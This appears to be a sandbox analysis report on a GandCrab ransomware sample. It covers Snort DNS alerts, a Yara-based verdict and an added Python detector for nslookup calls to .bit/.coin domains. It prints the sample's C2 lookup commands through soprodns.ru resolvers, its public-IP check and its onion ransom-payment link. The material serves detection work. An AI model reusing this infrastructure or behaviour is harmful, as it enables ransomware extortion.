                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58694 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58695 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58696 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60751 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60752 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60753 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60754 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56951 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56952 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56953 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56954 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65019 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65020 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65021 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65022 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53468 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53469 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53470 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53471 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61418 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61419 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61420 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61421 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65198 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65199 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65200 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65201 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53051 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53052 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53053 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53054 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60090 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60091 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60092 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60093 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53430 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53431 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53432 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53433 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65513 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65514 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65515 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65516 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51994 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51995 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51996 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51997 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58121 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58122 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58123 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58124 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58303 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58304 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58305 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58306 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63448 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63449 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63450 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63451 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65387 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65388 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65389 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:65390 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54155 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54156 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54157 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:54158 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50786 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50787 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50788 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:50789 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64123 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64124 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64125 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:64126 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60827 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60828 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60829 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60830 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49203 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49204 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49205 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49206 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60475 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60476 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60477 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60478 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56618 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56619 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56620 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56621 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57389 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57390 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57391 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57392 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50230 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50231 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50232 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50233 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52457 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52458 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52459 -> 8.8.8.8:53
                        Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52460 -> 8.8.8.8:53
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC66E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D6E90 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exe, 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe, 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe, 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exe | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: isqmkp.exe.1.dr | String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | DNS query: name: ipv4bot.whatismyipaddress.com (5 queries)
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.dr | String found in binary or memory: http://gdcbghvjyqy7jclk.onion/3a23db8448d3b2b
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ipv4bot.whatismyipaddress.com/
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ipv4bot.whatismyipaddress.com/4
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ipv4bot.whatismyipaddress.com/a
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.dr | String found in binary or memory: https://tox.chat/download.html
                        Source: gI5xZdIxUs.exe, isqmkp.exe.1.dr | String found in binary or memory: https://www.torproject.org/
                        Source: unknown | DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC67EF0 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree
                        Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
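                        The evidence above combines two observables that a detection engineer can turn into host- and network-side logic: nslookup.exe children whose command line names a blockchain TLD (.bit, .coin) and hands the query to an explicit third-party resolver (dns1/dns2.soprodns.ru), and the Snort alerts that fire in bursts of consecutive source ports while those children run. The following Python is an added example written for this page; it is not Joe Sandbox code and not part of the sample. The command lines and alert lines it embeds are constructed to match the shapes printed in this report; the benign command lines and the TLD set are assumptions used to show what does and does not fire.

```python
import re

# Constructed sample input, modelled on the evidence lines in this report: the command
# lines of the nslookup.exe children the sample spawned, plus a few benign lookups
# (assumptions, not from the report) to show what does not fire.
SAMPLE_CMDLINES = [
    "nslookup nomoreransom.coin dns1.soprodns.ru",
    "nslookup nomoreransom.bit dns1.soprodns.ru",
    "nslookup gandcrab.bit dns2.soprodns.ru",
    r'"C:\Windows\SysWOW64\nslookup.exe" gandcrab.bit dns1.soprodns.ru',
    "nslookup nomoreransom.bit",                 # blockchain TLD, default resolver
    "nslookup microsoft.com",                    # benign
    "nslookup -type=txt example.org 8.8.8.8",    # benign: explicit resolver, ICANN TLD
]

# Constructed sample of Snort alert lines, in the shape the report prints them.
SAMPLE_ALERTS = [
    "Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52957 -> 8.8.8.8:53",
    "Source: Traffic | Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:52958 -> 8.8.8.8:53",
    "Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60584 -> 8.8.8.8:53",
    "Source: Traffic | Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60585 -> 8.8.8.8:53",
]

# TLDs served only by blockchain/alternative DNS roots (.bit = Namecoin, .coin = Emercoin),
# the two seen in this report. A normal recursive resolver cannot answer for them, which is
# why the sample hands the query to a specific third-party resolver. Extend as needed.
BLOCKCHAIN_TLDS = {"bit", "coin"}

# Matches "nslookup ..." or a quoted/unquoted full path to nslookup.exe, then its arguments.
NSLOOKUP_RE = re.compile(
    r'^"?(?:[^"\s]*[\\/])?nslookup(?:\.exe)?"?\s+(?P<args>.+)$', re.IGNORECASE)

# Matches the "Snort IDS: <sid> <msg> <src>:<sport> -> <dst>:<dport>" tail of a report line.
SNORT_RE = re.compile(
    r"Snort IDS:\s*(?P<sid>\d+)\s+(?P<msg>.+?)\s+"
    r"(?P<src>\d+(?:\.\d+){3}):(?P<sport>\d+)\s*->\s*(?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+)")


def parse_nslookup(cmdline):
    """Return (queried_name, explicit_resolver_or_None) for an nslookup command line,
    or None if the line is not a non-interactive nslookup invocation."""
    m = NSLOOKUP_RE.match(cmdline.strip())
    if not m:
        return None
    # nslookup options start with '-' (e.g. -type=txt); the positionals are name [server].
    positional = [t for t in m.group("args").split() if not t.startswith("-")]
    if not positional:
        return None
    name = positional[0].lower().rstrip(".")
    server = positional[1].lower() if len(positional) > 1 else None
    return name, server


def classify_nslookup(cmdline):
    """'high' for a blockchain-TLD name sent to an explicit resolver (the pattern in this
    report), 'medium' for a blockchain-TLD name alone, None otherwise."""
    parsed = parse_nslookup(cmdline)
    if parsed is None:
        return None
    name, server = parsed
    if name.rsplit(".", 1)[-1] not in BLOCKCHAIN_TLDS:
        return None
    return "high" if server else "medium"


def triage(cmdlines):
    """Flag suspicious nslookup command lines; returns (severity, name, server) tuples."""
    hits = []
    for line in cmdlines:
        severity = classify_nslookup(line)
        if severity:
            name, server = parse_nslookup(line)
            hits.append((severity, name, server))
    return hits


def summarize_alerts(lines):
    """Group Snort alert lines by SID: message, destination and the source ports seen,
    which makes the burst pattern (one query per nslookup child) visible."""
    summary = {}
    for line in lines:
        m = SNORT_RE.search(line)
        if not m:
            continue
        entry = summary.setdefault(
            m["sid"], {"msg": m["msg"], "dst": f'{m["dst"]}:{m["dport"]}', "src_ports": []})
        entry["src_ports"].append(int(m["sport"]))
    for entry in summary.values():
        entry["src_ports"].sort()
    return summary


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print("nslookup %-6s %s via %s" % hit)
    for sid, entry in summarize_alerts(SAMPLE_ALERTS).items():
        print(sid, entry["msg"], "->", entry["dst"], "ports", entry["src_ports"])
```

                        On a live host the same classify_nslookup() would be fed process-creation command lines (Sysmon Event ID 1 or Security 4688); the parent being a user-profile executable rather than a shell, as in this report's process tree, is the extra context that pushes a "medium" hit to an incident.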

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: Yara match | File source: gI5xZdIxUs.exe, type: SAMPLE
                        Source: Yara match | File source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000014.00000000.322638424.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: isqmkp.exe PID: 5464, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: isqmkp.exe PID: 1572, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC66530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection
                        Source: nslookup.exe | Process created: 42

System Summary

Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: gI5xZdIxUs.exe, type: SAMPLE | Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE | Matched rule: Gandcrab Payload Author: kevoreilly
